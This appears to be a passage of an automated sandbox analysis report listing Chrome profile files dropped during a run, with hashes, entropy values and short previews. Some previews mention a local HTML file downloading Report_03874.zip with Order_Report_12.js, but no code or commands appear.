                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000001.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):3.7273991737283296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: *...#................version.1..namespace-..&f...............
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.102076985567792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+A1lLN23iKKdKkGckArZQM72KLlZvWMQL+q2PlLN23iKKdKkGckArZQMxIFUv:V5KkkGHAr9LPrQ+vy5KkkGHArAFUv
                                                                                                                                                                MD5:18DA57F9B111F001D794C084C1B9AA45
                                                                                                                                                                SHA1:C1C058C5C1856BFA353F06F0EA07AAA4A948C250
                                                                                                                                                                SHA-256:167C2A9B957273624110CD54E326C2D1B9CCD6E611E3DF030890E310593B4C67
                                                                                                                                                                SHA-512:661712E282D85212C158E3F702C3B0CFB2CF693EE064B3044CA343FCCF62D3FCF30F12AC5325049D52AE650D13BF5F7A7A6F94EBA4CA99D8200194B2A3476A14
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:57.402 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage since it was missing..2021/08/16-19:11:57.709 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG.oldn. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.102076985567792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+A1lLN23iKKdKkGckArZQM72KLlZvWMQL+q2PlLN23iKKdKkGckArZQMxIFUv:V5KkkGHAr9LPrQ+vy5KkkGHArAFUv
                                                                                                                                                                MD5:18DA57F9B111F001D794C084C1B9AA45
                                                                                                                                                                SHA1:C1C058C5C1856BFA353F06F0EA07AAA4A948C250
                                                                                                                                                                SHA-256:167C2A9B957273624110CD54E326C2D1B9CCD6E611E3DF030890E310593B4C67
                                                                                                                                                                SHA-512:661712E282D85212C158E3F702C3B0CFB2CF693EE064B3044CA343FCCF62D3FCF30F12AC5325049D52AE650D13BF5F7A7A6F94EBA4CA99D8200194B2A3476A14
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:57.402 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage since it was missing..2021/08/16-19:11:57.709 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PGP\011Secret Key -
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .|.."....leveldb.BytewiseComparator......
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):328
                                                                                                                                                                Entropy (8bit):5.211626072726702
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o+I+q2PlLN23iKKdKpIFUtpvo6cdFZZmwPvoe3VkwOlLN23iKKdKa/WLJ:w+dvy5KkmFUtpg6kZ/Pgi5L5KkaUJ
                                                                                                                                                                MD5:F387532C105F78AA45E71DEDFD084DE7
                                                                                                                                                                SHA1:E9664CA8B987B7C3497E24EC43BFC048706F56AF
                                                                                                                                                                SHA-256:549543E7E34A11052474F756BB6353A038ABCE412F18BA720D17A9F80877D5EC
                                                                                                                                                                SHA-512:EEE6534A4DDE9E7C5028B306C1BE79E470A356526A42705CC143B08103A5D6AB7BD89F148B14F3B04DF08BD3A34496DD19BA59809EC39CEEEB2DB614A12094FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.131 1c78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/08/16-19:10:30.135 1c78 Recovering log #3.2021/08/16-19:10:30.143 1c78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):328
                                                                                                                                                                Entropy (8bit):5.211626072726702
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o+I+q2PlLN23iKKdKpIFUtpvo6cdFZZmwPvoe3VkwOlLN23iKKdKa/WLJ:w+dvy5KkmFUtpg6kZ/Pgi5L5KkaUJ
                                                                                                                                                                MD5:F387532C105F78AA45E71DEDFD084DE7
                                                                                                                                                                SHA1:E9664CA8B987B7C3497E24EC43BFC048706F56AF
                                                                                                                                                                SHA-256:549543E7E34A11052474F756BB6353A038ABCE412F18BA720D17A9F80877D5EC
                                                                                                                                                                SHA-512:EEE6534A4DDE9E7C5028B306C1BE79E470A356526A42705CC143B08103A5D6AB7BD89F148B14F3B04DF08BD3A34496DD19BA59809EC39CEEEB2DB614A12094FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.131 1c78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/08/16-19:10:30.135 1c78 Recovering log #3.2021/08/16-19:10:30.143 1c78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):406
                                                                                                                                                                Entropy (8bit):5.314438233694713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+VL+q2PlLN23iKKdKks8Y5JKKhdIFUtpvq1ZmwPv0klLVkwOlLN23iKKdKks8Yx:Qvy5KkkOrsFUtpi1/Pt5L5KkkOrzJ
                                                                                                                                                                MD5:4515A2824F5BF0B48951997558914454
                                                                                                                                                                SHA1:DEF2B8AD78C5DFF10D72FC9CFD4AEDEEAE05E70A
                                                                                                                                                                SHA-256:E40E63C0C4829CF3F580D5F7F7D7918889150711594F63383C9BC64B8E0307EE
                                                                                                                                                                SHA-512:76E43CB497923EC27D8712BF4D12BB07E4259F061B23E569907AED6F45DA0724B866707A28343883B65110CAAC8269CE07DCCB3E0C57F5C428233D563D9A10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:58.387 2198 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/08/16-19:11:58.388 2198 Recovering log #3.2021/08/16-19:11:58.389 2198 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old4g (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):406
                                                                                                                                                                Entropy (8bit):5.314438233694713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+VL+q2PlLN23iKKdKks8Y5JKKhdIFUtpvq1ZmwPv0klLVkwOlLN23iKKdKks8Yx:Qvy5KkkOrsFUtpi1/Pt5L5KkkOrzJ
                                                                                                                                                                MD5:4515A2824F5BF0B48951997558914454
                                                                                                                                                                SHA1:DEF2B8AD78C5DFF10D72FC9CFD4AEDEEAE05E70A
                                                                                                                                                                SHA-256:E40E63C0C4829CF3F580D5F7F7D7918889150711594F63383C9BC64B8E0307EE
                                                                                                                                                                SHA-512:76E43CB497923EC27D8712BF4D12BB07E4259F061B23E569907AED6F45DA0724B866707A28343883B65110CAAC8269CE07DCCB3E0C57F5C428233D563D9A10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:58.387 2198 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/08/16-19:11:58.388 2198 Recovering log #3.2021/08/16-19:11:58.389 2198 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurityt (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):708
                                                                                                                                                                Entropy (8bit):5.564956104815177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YI9Mkq/HH+UAnIOVRWcNnYj+UAnIblTZCPXR7N+UAnI7PHt0FKO+UAnInQ:YIakq/HeU4nWaUxSh7wUhtVRUJQ
                                                                                                                                                                MD5:59E7A95B3EE22ADFEF4A42969734CE7B
                                                                                                                                                                SHA1:06A91D42BC129BD3E4273E7FCF43563FC15A1C3A
                                                                                                                                                                SHA-256:3A8F1C81B97F32A06FBD7B3A2200B2FC1DE77EA39CAC6E1AC3FBAF48045822E9
                                                                                                                                                                SHA-512:3BC57E33A4F26FCE59BDBEEE4E12704767AF6EC5366416B947D8CC42F627D708FA194DCB2BD9D2A2E2CDF72E35E29F9677E62ADDBD825985C0BEB280DD61E9CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"expect_ct":[],"sts":[{"expiry":1654701301.094781,"host":"0J7rAWV0ouCFYJ9XrkDiKnAO1SshXJmLJE1SS3V8kDM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165301.094784},{"expiry":1654701298.912333,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165298.912336},{"expiry":1660702234.469224,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1629166234.469228},{"expiry":1654701300.827908,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165300.827911}],"version":2}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                Entropy (8bit):0.0033616753448762224
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ImtVuVsDXlh76W9l/:IiVuQD6W9t
                                                                                                                                                                MD5:E38EE1D12286079453493BEF5985C1A9
                                                                                                                                                                SHA1:A8CC9AE6D75FED5054973538FA719E5F28B8AC62
                                                                                                                                                                SHA-256:09A14A922584D14AB6051BF56DA21F480B4AC3EE1AF66BA5CF64A68DC44746FA
                                                                                                                                                                SHA-512:79C3374BDE738E4DEBA9E6CDDFCBDD64B1CEF53F37D7BA96CC58E0DD276CB312953EE0DB1F355949C669F6DE8E7C21BBF583B9B1C3102793378AB152EB7B7BAC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: VLnk.....?......j....l7................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                Entropy (8bit):1.2247582786585376
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:5qOBhedSLH9QTJMbMB4n+ymGPF6P/1Vum:oOB6Sz9rn+ymyI/1Vum
                                                                                                                                                                MD5:6D741023AA69E2D4B124E4436F15E1A8
                                                                                                                                                                SHA1:781C1E2C45C02C80FF693CA15A02525F4BCC91FF
                                                                                                                                                                SHA-256:1D43AA9AAE20BA2B89AAF6101C93FAF4318116B0F0579A5EC04FC103AA978F19
                                                                                                                                                                SHA-512:5CEA97EF5DD03AC7C14F8748D5A00ABDB3CB32AB14ED14C1E765FA0086C68C2A1501AE790DE1B208B44DC375A02EAD586FE4814E08E1E55863E3A767B362748F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ .......-...........&......................................................O}...........)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a060a3c3-36d4-4a84-adc3-1316937f3621.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PDP-11 pure executable not stripped - version 110
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):568
                                                                                                                                                                Entropy (8bit):6.145403243894182
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:2vLOBwZDHVOBGJBVzu7xwDwZobAiUBVz7iPBVzJP:2pZ7LJ/zu7o4oby/z7S/zd
                                                                                                                                                                MD5:146B5BEAA4E5CF1AC630DCD71D25C41B
                                                                                                                                                                SHA1:6E4055716544A8B8312CDA96EE4EAFDDC46ECF3C
                                                                                                                                                                SHA-256:A9828D42F74D9959FBEDE9E6F0BF7A97367EC03789317BE51E9ED4A083D5BB1C
                                                                                                                                                                SHA-512:02168217291C6AA72194452CAFD4AF6E29E29BD4C12620CAB07D86BC9F9F635358EB8227D0F144D78061529A49D69A88776F602D2EBE274AFD9686E5DC43A0F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/a97e8999-2326-461e-9e14-63430d44f79c.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874.zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."*file:///C:/Users/user/Desktop/file.html0.9......wBB0..blob:null/a97e8999-2326-461e-9e14-63430d44f79c..?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X...................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b9874609-0755-43b7-b6c7-7c31949a62f6.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950593325875801
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuzip:n50nNmaRWMoiVmdeVtMVuzip
                                                                                                                                                                MD5:045C0EBF4C833D8A4A9EAA9723D5EB02
                                                                                                                                                                SHA1:EF28657CEFCE81216DFF3F608CD6310C4E6AC757
                                                                                                                                                                SHA-256:9B69787E9926249202EA2E9132E15FC8EBC39E4557F5AB3B753987413C050126
                                                                                                                                                                SHA-512:782CE44E864A54C38119AF18C3C297BF6458F69BCEBB1C638E39A7EE3C241E68DE16E6DEE5DB5C869296A4A6FF28A68D35FF1219653468B6130D9F0D51D046A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\be0399a6-b972-4a8b-b9ea-55a64c829821.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):680
                                                                                                                                                                Entropy (8bit):6.098219793807082
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wPDdYZDHVO5PDMJBVzuEu7xwDwZobUPDlBVztnePDYMJBVzeqBVzDBVzu+Nm:wbdYZ7KbMJ/zuh7o4obUbl/zVebhJ/zE
                                                                                                                                                                MD5:86101CF5F599E51247715E7C293FA942
                                                                                                                                                                SHA1:9CB75E8D675264F35D447E4008457987BB756903
                                                                                                                                                                SHA-256:8584D978FD02B4E33526B555585C6E2071F637FD04A0D4A0A35418803F901E81
                                                                                                                                                                SHA-512:3EA98F3741F0BEE3057BD54118F68E355D5A0D0C4DE4AC6F289FE2F5CE8FA6DC0DD52279D3351DEECC94BBBBCD0C28B55F24BD4D5864ED767D7D4713918DADDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874 (1).zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."*file:///C:/Users/user/Desktop/file.html0.9..T...wBB0..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8..i.*file:///C:/Users/user/Desktop/file.html.."*file:///C:/Users/user/Desktop/file.html0.9..J...wBP.X...?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X..................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c7417b8f-4d55-45eb-8794-3ab1661c8641.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15154
                                                                                                                                                                Entropy (8bit):5.580392987991728
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OUptaLl7Xl1kXqKf/pUZNCgVLH2HfEKrU5m+m4k:4Lljl1kXqKf/pUZNCgVLH2HfzrU5XmL
                                                                                                                                                                MD5:5AF9337C8C8CC0DC77EDB919BCDA0BA9
                                                                                                                                                                SHA1:FBF5E771847BB6217EF8679568D354642FD04B08
                                                                                                                                                                SHA-256:6B43675406FF7B40A8CCAF2D98807BF2974268A7444511C902BE9289F7ADF1B3
                                                                                                                                                                SHA-512:5DFFA7577A3EBB8ADFE37C71A25E5AF7ACC2CC225FAE67BCD82F0DCF5972CB974E5FFDAE143A91747428A8E68C148FA50B65B26DF147F4D8D9B0B93F0A46F966
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cfc33a6c-cad8-4a25-bfae-c8ec58b2a2b5.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17957
                                                                                                                                                                Entropy (8bit):5.564879279388686
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGknWFm4w:GLljQ1kXqKf/pUZNCgVLH2HftrULBGHM
                                                                                                                                                                MD5:235682EDB9CF4723B948EC5F0E8D3681
                                                                                                                                                                SHA1:682190522561D7639E71CC3B00C17816D6874D67
                                                                                                                                                                SHA-256:11AB472B937F7BA50EE53A77D7AB5A98ACEEF122B9977019E338BB21A186B299
                                                                                                                                                                SHA-512:99A41CF7C43E12673AAEB24CAF0EBE07AB5F23C0553CFB92C3ED0D8F83A80A07E08DD29ACCE96E883EE7561339A44810DDA912452D22BDA597023CCF8E3D0CEF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
